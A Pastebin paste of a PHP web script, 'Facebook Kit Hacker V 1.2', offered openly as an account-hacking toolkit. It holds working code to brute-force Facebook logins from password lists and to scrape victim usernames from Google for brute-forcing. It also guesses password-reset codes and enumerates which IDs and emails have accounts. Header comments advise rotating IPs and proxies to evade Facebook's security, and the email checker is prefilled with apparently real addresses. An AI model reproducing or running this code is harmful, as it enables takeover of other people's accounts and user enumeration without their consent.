yowrizxc

[PHP] Facebook Kit Hacker V 1.2

Nov 18th, 2015
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.38 KB | None | 0 0
  1. <?php
  2. session_start();
  3. @ini_set("max_execution_time",0);
  4. @set_time_limit(0); #No Fx in SafeMode
  5. @ignore_user_abort(TRUE);
  6. @set_magic_quotes_runtime(0);
  7. ##############################################################################
  8. // Use your mind to escape Facebook Security \!/ #
  9. // Don't Allow Cookies in your browser (Use priv8 browsing) #
  10. // Change your IP and DNS each 2 seconds and your Job will be Great °_° #
  11. // GreetZ To : All HaxxorPH MemberZ \!/ #
  12. // You can edit this script but don't forget to mention the authors °_° #
  13. // Tutorial Video: https://www.youtube.com/watch?v=66a_wOwOT48 #
  14. ##############################################################################
  15. echo '
  16. <html>
  17. <title>Facebook Kit Hacker V 1.2</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
  18. <body style="background-color:black;">
  19. <style type="text/css">
  20. body {
  21. background:
  22. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  23. url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
  24. background-color: #000000;
  25. }
  26. a{
  27. text-decoration:none;
  28. border:1px solid #12549c;
  29. border-radius:5px;
  30. background-color:black;
  31. color:white;
  32. font-family:Arial;
  33. font-size:17;
  34. box-shadow: 0px 0px 12px #21a0ed;
  35. }
  36. #r{
  37. border-bottom:1px solid #12549c;
  38. }
  39. </style>
  40.  
  41. <head>
  42. </body>
  43. </html>
  44. <center><font color="white" face="impact" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
  45. ';
  46.  
  47. echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly93d3cucGF0cmlvdHNwb2ludC5vcmcvbmV3c19ldmVudHMvd3AtY29udGVudC9wbHVnaW5zL3RyYWNrYWJsZS1zb2NpYWwtc2hhcmUtaWNvbnMvYnV0dG9ucy9mMi8vZmFjZWJvb2sucG5nIi8+").'</center>';
  48.  
  49. echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
  50.  
  51. echo '</font></b></div><br></center>';
  52.  
  53. ?>
  54. <div id="det" align="center">
  55.  
  56. </div>
  57. </center>
  58. <div id="r" align="center">
  59. <a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>">&nbsp;Home&nbsp;</a></font>
  60. <a href="?action=baipas">&nbsp;FB Brute Force&nbsp;</a></font>
  61. <a href="?action=brut">&nbsp;FB Ghost Catcher&nbsp;</a></font>
  62. <a href="?action=crack">&nbsp;FB Reset Code&nbsp;</a></font>
  63. <a href="?action=passgen">&nbsp;Reset Code Generator&nbsp;</a></font>
  64. <a href="?action=idgen">&nbsp;FB ID Generator&nbsp;</a></font>
  65. <a href="?action=graph">&nbsp;FB ID Checker&nbsp;</a></font>
  66. <a href="?action=emailchk">&nbsp;FB Email Checker&nbsp;</a></font>
  67. <audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
  68. </div><br>
  69. <?php
  70. if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
  71. @error_reporting(0);
  72. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  73. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  74. $validCharNumber = strlen($validCharacters);
  75. $len = 10;
  76. $result = "";
  77.  
  78. for ($i = 0; $i < $len; $i++) {
  79. $index = mt_rand(0, $validCharNumber - 1);
  80. $result .= $validCharacters[$index];
  81. }
  82.  
  83. return $result;
  84. }
  85. echo'
  86. <style>
  87. textarea {
  88. resize:none;
  89. color: #1975FF ;
  90. border:1px solid #1975FF ;
  91. border-left: 4px solid #1975FF ;
  92. }
  93. input {
  94. color: ##33CCFF;
  95. border:1px dotted #33CCFF;
  96. }
  97. </style>
  98. <p><center><font face="impact" color="White" size="4">Facebook ID Generator
  99. </center><center></font><br>
  100. <title>Facebook ID Generator</title>
  101. <form method="post">
  102. <font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
  103. <input type="submit" value="Generate" name="fbmailgen">
  104. </form><br>';
  105.  
  106. $len = $_POST['len'];
  107. $nr = $_POST['nr'];
  108. if ($_POST['fbmailgen']) {
  109. echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
  110. for ($x=0; $x < $nr ; $x++){
  111. echo "10000" . getRandomString() . "\r\n";
  112. }
  113. echo "</textarea><br>";
  114. echo "
  115. <br>
  116. <b>
  117. </b>
  118. <br>
  119. ";
  120. }
  121. }
  122. if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
  123. @error_reporting(0);
  124. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  125. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  126. $validCharNumber = strlen($validCharacters);
  127. $len = 6;
  128. $result = "";
  129.  
  130. for ($i = 0; $i < $len; $i++) {
  131. $index = mt_rand(0, $validCharNumber - 1);
  132. $result .= $validCharacters[$index];
  133. }
  134.  
  135. return $result;
  136. }
  137. echo'
  138. <style>
  139. textarea {
  140. resize:none;
  141. color: #1975FF ;
  142. border:1px solid #1975FF ;
  143. border-left: 4px solid #1975FF ;
  144. }
  145. input {
  146. color: ##33CCFF;
  147. border:1px dotted #33CCFF;
  148. }
  149. </style>
  150. <p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
  151. </center><center><br>
  152. <title>Facebook Reset Code Generator</title>
  153. <form method="post">
  154. <font color="white">Number Of Reset Codes : &nbsp;&nbsp;<input type="text" name="nr"><br><br></font>
  155. <input type="submit" value="Generate" name="fbmailgen">
  156. </form><br>';
  157. $len = $_POST['len'];
  158. $nr = $_POST['nr'];
  159. if ($_POST['fbmailgen']) {
  160. echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
  161. for ($x=0; $x < $nr ; $x++){
  162. echo getRandomString() . "\r\n";
  163. }
  164. echo "</textarea><br>";
  165. echo "
  166. <br>
  167. <b>
  168. </b>
  169. <br>
  170. ";
  171. }}
  172. if(isset($_GET['action']) && $_GET['action'] == 'brut'){
  173. echo"
  174. <style>
  175. textarea {
  176. resize:none;
  177. color: #1975FF ;
  178. border:1px solid #1975FF ;
  179. border-left: 4px solid #1975FF ;
  180. }
  181. input {
  182. color: ##33CCFF;
  183. border:1px dotted #33CCFF;
  184. }
  185. select {
  186. color: ##33CCFF;
  187. border:1px dotted #33CCFF;
  188. }
  189. </style>
  190. <title>F4c3b00k Gh0sT</title>
  191. <form method='POST'>
  192. <center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by Skidiot~ Of HaxxorPH</font><br></center><br>
  193. <center>
  194. <center><font face='arial' size='1' color='red'>Server</font><br></center>
  195. <select name=country><br><br>
  196. <option value='Choose Country'>Choose The Country</option>
  197. <option value='site:fr-fr.facebook.com/'>France</option>
  198. <option value='site:ar-ar.facebook.com/'>Arab Countries</option>
  199. <option value='site:es-es.facebook.com/'>Spain</option>
  200. <option value='site:tr-tr.facebook.com/'>Turkey</option>
  201. <option value='site:de-de.facebook.com/'>Germany</option>
  202. <option value='site:pt-pt.facebook.com/'>Portugual</option>
  203. <option value='site:it-it.facebook.com/'>Italy</option>
  204. <option value='site:hi-in.facebook.com/'>India</option>
  205. <option value='site:sr-rs.facebook.com/'>Serbia</option>
  206. <option value='site:el-gr.facebook.com/'>Greece</option>
  207. <option value='site:he-il.facebook.com/'>Israel</option>
  208. <option value='site:id-id.facebook.com/'>Indonesia</option>
  209. <option value='site:ru-ru.facebook.com/'>Russia</option>
  210. <option value='site:nl-nl.facebook.com/'>Netherlands</option>
  211. <option value='site:bg-bg.facebook.com/'>Bulgaria</option>
  212. <option value='site:mk-mk.facebook.com/'>Macedonia</option>
  213. <option value='site:uk-ua.facebook.com/'>Ukraine</option>
  214. <option value='site:zh-cn.facebook.com/'>China</option>
  215. <option value='site:ph-ph.facebook.com/'>Philippines</option>
  216. </select><br><br>
  217. </center>
  218. <center>
  219. <input type='text' name='victim' placeholder='Victim Name'><br><br>
  220. <textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
  221. <input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
  222. </form>
  223. <center>
  224. <font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
  225. ";
  226. set_time_limit(0);
  227. ini_set('memory_limit', '64M');
  228. header('Content-Type: text/html; charset=UTF-8');
  229. function letItBy(){ ob_flush(); flush(); }
  230.  
  231. $country = $_POST['country'];
  232. $victim = $_POST['victim'];
  233. $bing = "{$country}"."{$victim}";
  234. $password = explode("\r\n",htmlentities($_POST['pass']));
  235. //Function that gets google urls
  236. function google_that($query, $page=1)
  237. {
  238. $resultPerPage=8;
  239. $start = $page*$resultPerPage;
  240. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  241. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  242. if(isset($resultFromGoogle['responseStatus'])) {
  243. if($resultFromGoogle['responseStatus'] != '200') return false;
  244. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  245. else return $resultFromGoogle['responseData']['results'];
  246. }
  247. else
  248. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  249. }
  250. function http_get($url, $safemode = false){
  251. if($safemode === true) sleep(1);
  252. $im = curl_init($url);
  253. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  254. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  255. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  256. curl_setopt($im, CURLOPT_HEADER, 0);
  257. return curl_exec($im);
  258. curl_close();
  259. }
  260. function brute($user,$pass){
  261. $ch = curl_init();
  262. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  263. curl_setopt($ch, CURLOPT_HEADER, 0);
  264. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  265. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  266. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  267. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  268. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  269. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  270. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  271. $login = curl_exec($ch);
  272. //print_r($login);
  273. $check = (eregi('class="s t i u"',$login)) ? true:false;
  274. if($check == true){
  275. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  276. }else{
  277. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  278. }
  279. }
  280.  
  281.  
  282. if(isset($_POST['start'])){
  283.  
  284. letItBy();
  285. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  286. $googleResult = google_that($bing, $googlePage);
  287. if(!$googleResult) {
  288. echo 'Finished scanning.';
  289.  
  290. break;
  291. }
  292.  
  293. // Gets the username of victim
  294.  
  295. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  296.  
  297. $result = $googleResult[$victim]['unescapedUrl'];
  298. if($country == "site:fr-fr.facebook.com/"){
  299. $rsss = str_replace("https://fr-fr.facebook.com/","",$result);
  300. }
  301. elseif($country == "site:ar-ar.facebook.com/"){
  302. $rsss = str_replace("https://ar-ar.facebook.com/","",$result);
  303. }
  304. elseif($country == "site:es-es.facebook.com/"){
  305. $rsss = str_replace("https://es-es.facebook.com/","",$result);
  306. }
  307. elseif($country == "site:tr-tr.facebook.com/"){
  308. $rsss = str_replace("https://tr-tr.facebook.com/","",$result);
  309. }
  310. elseif($country == "site:de-de.facebook.com/"){
  311. $rsss = str_replace("https://de-de.facebook.com/","",$result);
  312. }
  313. elseif($country == "site:pt-pt.facebook.com/"){
  314. $rsss = str_replace("https://pt-pt.facebook.com/","",$result);
  315. }
  316. elseif($country == "site:it-it.facebook.com/"){
  317. $rsss = str_replace("https://it-it.facebook.com/","",$result);
  318. }
  319. elseif($country == "site:hi-in.facebook.com/"){
  320. $rsss = str_replace("https://hi-in.facebook.com/","",$result);
  321. }
  322. elseif($country == "site:zh-cn.facebook.com/"){
  323. $rsss = str_replace("https://zh-cn.facebook.com/","",$result);
  324. }
  325. elseif($country == "site:sr-rs.facebook.com/"){
  326. $rsss = str_replace("https://sr-rs.facebook.com/","",$result);
  327. }
  328. elseif($country == "site:el-gr.facebook.com/"){
  329. $rsss = str_replace("https://el-gr.facebook.com/","",$result);
  330. }
  331. elseif($country == "site:he-il.facebook.com/"){
  332. $rsss = str_replace("https://he-il.facebook.com/","",$result);
  333. }
  334. elseif($country == "site:id-id.facebook.com/"){
  335. $rsss = str_replace("https://id-id.facebook.com/","",$result);
  336. }
  337. elseif($country == "site:ru-ru.facebook.com/"){
  338. $rsss = str_replace("https://ru-ru.facebook.com/","",$result);
  339. }
  340. elseif($country == "site:nl-nl.facebook.com/"){
  341. $rsss = str_replace("https://nl-nl.facebook.com/","",$result);
  342. }
  343. elseif($country == "site:bg-bg.facebook.com/"){
  344. $rsss = str_replace("https://bg-bg.facebook.com/","",$result);
  345. }
  346. elseif($country == "site:mk-mk.facebook.com/"){
  347. $rsss = str_replace("https://mk-mk.facebook.com/","",$result);
  348. }
  349. elseif($country == "site:uk-ua.facebook.com/"){
  350. $rsss = str_replace("https://uk-ua.facebook.com/","",$result);
  351. }
  352. $users = explode("?", $rsss);
  353. $users = $users[0];
  354.  
  355. //Bruteforce Function
  356.  
  357. foreach($password as $pass)
  358. {
  359.  
  360. echo brute($users,$pass);
  361. }}}}
  362.  
  363. #Added By AnonGuy From Madleets
  364. if(stristr(php_uname(),"Windows"))
  365. {system("del cookie.txt");}
  366. elseif(stristr(php_uname(),"Linux"))
  367. {system("rm cookie.txt");}}
  368. #
  369. if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
  370. ob_start();
  371. @set_time_limit(0);
  372. echo "
  373. <head>
  374. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  375. <form method='POST'>
  376. <title>Facebook Brute Force 2014</title>
  377. </head>
  378. <style>
  379. textarea {
  380. resize:none;
  381. color: #1975FF ;
  382. border:1px solid #1975FF ;
  383. border-left: 4px solid #1975FF ;
  384. }
  385. input {
  386. color: ##33CCFF;
  387. border:1px dotted #33CCFF;
  388. }
  389. </style>";
  390.  
  391. echo "
  392. <body text='#FFFFFF' >
  393. <center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Skidiot </center></font><br>
  394. <p dir='ltr' align='center'>
  395. <textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
  396. <textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
  397. <br>
  398. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
  399. if(isset($_POST['scan'])){
  400. #To Put Proxy SOCKS V5
  401. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  402. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  403. function brute($user,$pass){
  404. $ch = curl_init();
  405. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  406. curl_setopt($ch, CURLOPT_HEADER, 0);
  407. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  408. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  409. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  410. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  411. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  412. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  413. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  414. $login = curl_exec($ch);
  415. //print_r($login);
  416. $check = (eregi('class="s t i u"',$login)) ? true:false;
  417. if($check == true){
  418. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  419. }else{
  420. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  421. }
  422. }
  423.  
  424.  
  425.  
  426.  
  427. $username = explode("\n", htmlentities($_POST['username']));
  428. $password = explode("\n", htmlentities($_POST['password']));
  429.  
  430.  
  431. foreach($username as $users) {
  432. $users = @trim($users);
  433. foreach($password as $pass) {
  434. $pass = @trim($pass);
  435. echo brute($users,$pass);
  436. }
  437.  
  438. }
  439.  
  440.  
  441. #Added By AnonGuy From Madleets
  442. if(stristr(php_uname(),"Windows"))
  443. {system("del cookie.txt");}
  444. elseif(stristr(php_uname(),"Linux"))
  445. {system("rm cookie.txt");}}
  446. #
  447. }
  448.  
  449. if(isset($_GET['action']) && $_GET['action'] == 'crack'){
  450.  
  451. @set_time_limit(0);
  452. echo "<form method='POST'>
  453. <title>Facebook Code Security Cracker > By Skidiot~</title>
  454. <style>
  455. /* Rounded Corners */
  456. #ghost {
  457. resize:none;
  458. color: #1975FF ;
  459. border:1px solid #1975FF ;
  460. border-left: 4px solid #1975FF ;
  461. height: 250px;
  462. width: 200px; }
  463. input {
  464. /* INPUTS */
  465. border: 1px solid #12549c;
  466. }
  467. </style>
  468. <center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Skidiot~</center><br>
  469. <center><input type='text' name='target' placeholder='Victim'></center><br>
  470. <center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
  471. <p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
  472. </form>";
  473. $target=$_POST['target'];
  474. $user = explode("\r\n", htmlentities($_POST['code']));
  475. if($_POST['scan'])
  476. {
  477. foreach($user as $code)
  478. {
  479. // Curl Function ^_^
  480. $ch = curl_init();
  481. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
  482. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  483. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  484. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  485. curl_setopt($ch, CURLOPT_HEADER, 1);
  486. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  487. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  488. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  489.  
  490. $check = curl_exec($ch);
  491. if(eregi("password_new", $check)) //Keyword Good Response ^_^
  492. {
  493. echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
  494. }
  495. else
  496. {
  497. echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
  498. }
  499. curl_close($ch);
  500. }
  501. }
  502. #Added By AnonGuy From Madleets
  503. if(stristr(php_uname(),"Windows"))
  504. {system("del cookie.txt");}
  505. elseif(stristr(php_uname(),"Linux"))
  506. {system("rm cookie.txt");}
  507. #
  508.  
  509. }
  510. ob_end_flush();
  511.  
  512. echo '<center><font color="red" face="arial" size="2" align="">Coded By Prinsipe Ng Haxor</font></center>';
  513.  
  514. if(isset($_GET['action']) && $_GET['action'] == 'graph'){
  515.  
  516.  
  517.  
  518. @set_time_limit(0);
  519. echo "<form method='POST'>
  520. <title>Facebook ID's Checker By Prinispe Ng Haxorr</title>
  521. <style>
  522. /* Rounded Corners */
  523. #ghost {
  524. resize:none;
  525. color: #1975FF ;
  526. border:1px solid #1975FF ;
  527. border-left: 4px solid #1975FF ;
  528. height: 250px;
  529. width: 200px; }
  530. input {
  531. /* INPUTS */
  532. border: 1px solid #12549c;
  533. }
  534. </style>
  535. <center><font color='White' size='4' face='impact'>Facebook ID's Checker By SKIDIOT~</center><br>
  536. <center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
  537. <p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
  538. </form>";
  539.  
  540. $user = explode("\r\n", htmlentities($_POST['code']));
  541. if($_POST['scan'])
  542. {
  543. foreach($user as $code)
  544. {
  545. // Curl Function ^_^
  546. $ch = curl_init();
  547. curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
  548. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  549. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  550. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  551. curl_setopt($ch, CURLOPT_HEADER, 1);
  552. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  553. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  554. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  555.  
  556. $check = curl_exec($ch);
  557. if(eregi("username", $check)) //Keyword Good Response ^_^
  558. {
  559. echo "<center><font face='Tahoma' size='2' color='green'><a href='http://graph.facebook.com/{$code}' target='_blank'>$code => ID IS CORRECT ^_^</a> </font><br></center>";
  560. }
  561. else
  562. {
  563. echo "<center><font face='Tahoma' size='2' color='red'><a href='http://graph.facebook.com/{$code}' target='_blank'>$code => ID IS FALSE :(</a></font><br></center>";
  564. }
  565. curl_close($ch);
  566. }
  567. }
  568. #Added By AnonGuy From Madleets
  569. if(stristr(php_uname(),"Windows"))
  570. {system("del cookie.txt");}
  571. else if(stristr(php_uname(),"Linux"))
  572. {system("rm cookie.txt");}}
  573. #
  574. echo "</center><center>";
  575.  
  576.  
  577. if(isset($_GET['action']) && $_GET['action'] == 'emailchk'){
  578. //HaxxorPH Team is Everywhere \!/
  579. ob_start();
  580. @set_time_limit(0);
  581. error_reporting(E_ERROR | E_PARSE);
  582. echo "
  583. <body bgcolor='black'>
  584. <head>
  585. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  586. <form method='POST'>
  587. <title>Facebook Email Checker</title>
  588. </head>";
  589. echo "
  590. <style>
  591. #s{
  592. margin-bottom:15px;}
  593. textarea{
  594. resize:none;
  595. background-color:black;
  596. color:#26a1ff;
  597. border:1px solid #0088ec;
  598. border-radius:10px;
  599. box-shadow:0px 0px 10px #26a1ff;
  600. }
  601. input{
  602. color:#0088ec;
  603. background-color:black;
  604. border:1px solid #0088ec;
  605. }
  606. </style>
  607. <center><b><br><br><font face='impact' size='5' color='red'><img width='85' height='85' src='http://i.imgur.com/Bpshup3.png'><img id='s' src='http://i.imgur.com/6e41km8.jpg'><br></font></b></center>
  608. <p dir='ltr' align='center'>
  609. <center><textarea cols='39' rows='12' id='ghost' name='email' >nathyobobs@gmail.com
  610. finn.asmodeous@yahoo.com.ph
  611. nathyobobs@yahoo.com</textarea><br></center><br>
  612. <center><input type='submit' name='scan' value='Start checking'><br><br>
  613. <input type='checkbox' name='save' value='Save Working Facebook Emails to fbemails.txt file'><font color='#0088ec'>Save Working Facebook Emails to fbemails.txt file</font><br></p></center>";
  614. $emailz = explode("\r\n", htmlentities($_POST['email']));
  615. if($_POST['scan'])
  616. {
  617. foreach($emailz as $email)
  618. {
  619. // Curl Function ^_^
  620. $ch = curl_init();
  621. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login/identify/?ctx=recover");
  622. curl_setopt($ch, CURLOPT_HEADER, 1);
  623. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  624. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  625. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  626. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$email}");
  627. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  628. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  629.  
  630. $check = curl_exec($ch);
  631. if(eregi("recover_method", $check)) //Keyword Good Response ^_^ \!/
  632. {
  633. echo "<center><font face='Tahoma' size='2' color='green'>$email => Facebook User Email Found ^_^</a> </font><br></center>";
  634. if(isset($_POST['save'])){
  635. $handle= fopen ("fbemails.txt",a);
  636. fwrite($handle,$email . "\r\n");
  637. fclose();
  638. }
  639. }
  640. else
  641. {
  642. echo "<center><font face='Tahoma' size='2' color='red'>$email => Not a Facebook Email :(</a></font><br></center>";
  643. }
  644. curl_close($ch);
  645. }
  646. }
  647.  
  648. # Delete Cookies wkwkwkwkw \!/
  649. if(stristr(php_uname(),"Windows"))
  650. {system("del cookie.txt");}
  651. else if(stristr(php_uname(),"Linux"))
  652. {system("rm cookie.txt");}}
  653. #
  654. ob_end_flush();
  655. ?>
Add Comment
Please, Sign In to add comment